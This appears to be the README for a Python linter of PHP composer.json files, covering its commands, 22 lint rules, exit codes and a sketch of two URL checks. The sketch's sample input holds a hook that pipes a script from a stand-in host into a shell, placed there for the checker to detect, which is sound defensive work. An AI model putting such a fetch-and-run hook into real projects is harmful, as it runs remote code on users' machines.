Composer JSON Validator
Validate and lint PHP Composer composer.json files for structure, dependencies, autoload configuration, and best practices.
Commands
lint — Run all lint checks
python3 scripts/composer_json_validator.py lint composer.json
python3 scripts/composer_json_validator.py lint composer.json --strict
python3 scripts/composer_json_validator.py lint composer.json --format json
python3 scripts/composer_json_validator.py lint composer.json --format markdown
dependencies — Inspect require/require-dev
python3 scripts/composer_json_validator.py dependencies composer.json
python3 scripts/composer_json_validator.py dependencies composer.json --format json
scripts — Inspect scripts section
python3 scripts/composer_json_validator.py scripts composer.json
python3 scripts/composer_json_validator.py scripts composer.json --format markdown
validate — Full validation (structure + lint + summary)
python3 scripts/composer_json_validator.py validate composer.json
python3 scripts/composer_json_validator.py validate composer.json --strict --format json
Flags
| Flag | Description |
|---|---|
| --strict | Exit code 1 on warnings (CI-friendly) |
| --format text | Human-readable output (default) |
| --format json | Machine-readable JSON |
| --format markdown | Markdown report |
Lint Rules (22 checks)
Structure (5)
- Valid JSON syntax
- Required fields: name, description, type
- Valid package name format (vendor/package)
- Valid type value (library, project, metapackage, composer-plugin)
- license field present and valid SPDX identifier
Dependencies (6)
- No duplicate packages across require and require-dev
- Version constraints use valid operators (^, ~, >=, etc.)
- No dev-only packages in require (phpunit, mockery, etc.)
- No wildcard * versions
- PHP version constraint present in require
- ext-* dependencies are explicit (not *)
Autoload (4)
- PSR-4 autoload defined
- Namespace ends with \\ (PSR-4 convention)
- No duplicate namespaces across autoload entries
- autoload-dev separate from autoload
Best Practices (7)
- scripts section present
- No post-install-cmd/post-update-cmd executing arbitrary URLs
- config.sort-packages enabled
- minimum-stability explicit when not stable
- prefer-stable set when minimum-stability is not stable
- No hardcoded absolute paths in autoload
- All repository URLs use HTTPS
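
The two URL-related rules above (install/update hooks that reference URLs, and non-HTTPS repository URLs) can be checked as in the following sketch. This is an added example, not the code in scripts/composer_json_validator.py; the function name, the regexes, and the interpretation of "executing arbitrary URLs" as "any http/https/ftp URL in the hook command" are assumptions.

```python
import json
import re

# Assumption: a hook "executes a URL" if its command line contains an
# http/https/ftp URL (for example a download piped into a shell).
URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s'\"|;&)]+", re.IGNORECASE)
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.-]*)://", re.IGNORECASE)
HOOKS = ("post-install-cmd", "post-update-cmd")

def check_hooks_and_repos(composer_text):
    """Return (section, message) findings for the two URL-related rules."""
    data = json.loads(composer_text)
    findings = []
    scripts = data.get("scripts") or {}
    for hook in HOOKS:
        cmds = scripts.get(hook, [])
        if isinstance(cmds, str):  # Composer accepts one string or a list
            cmds = [cmds]
        for cmd in cmds:
            for url in URL_RE.findall(str(cmd)):
                findings.append(("scripts", f"{hook} references URL {url}"))
    repos = data.get("repositories") or []
    if isinstance(repos, dict):  # object form: {"name": {...}} or {"name": false}
        repos = list(repos.values())
    for repo in repos:
        if not isinstance(repo, dict):
            continue
        url = str(repo.get("url", ""))
        m = SCHEME_RE.match(url)
        # Scheme-less values (local paths for "path"/"artifact" repos) are skipped.
        if m and m.group(1).lower() != "https":
            findings.append(("repositories", f"{url} does not use HTTPS"))
    return findings

# Constructed sample input, not taken from a real project.
SAMPLE = r'''{
  "name": "acme/demo",
  "repositories": [
    {"type": "composer", "url": "http://packages.example.test"},
    {"type": "vcs", "url": "https://git.example.test/acme/lib.git"},
    {"type": "path", "url": "../local-lib"}
  ],
  "scripts": {
    "post-install-cmd": ["curl -s http://example.test/setup.sh | sh", "@php artisan optimize"],
    "post-update-cmd": "phpunit --version"
  }
}'''

if __name__ == "__main__":
    for section, message in check_hooks_and_repos(SAMPLE):
        print(f"{section}: {message}")
```
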
Exit Codes
| Code | Meaning |
|---|---|
| 0 | No errors (warnings allowed unless --strict) |
| 1 | Errors found (or warnings in --strict mode) |
| 2 | Invalid arguments / file not found |
Example Output
composer.json lint results
==========================
[ERROR] name: Package name must match vendor/package format
[WARN] dependencies: phpunit/phpunit found in require (should be in require-dev)
[WARN] autoload: config.sort-packages not enabled
[INFO] scripts: scripts section present
Summary: 1 error(s), 2 warning(s), 1 info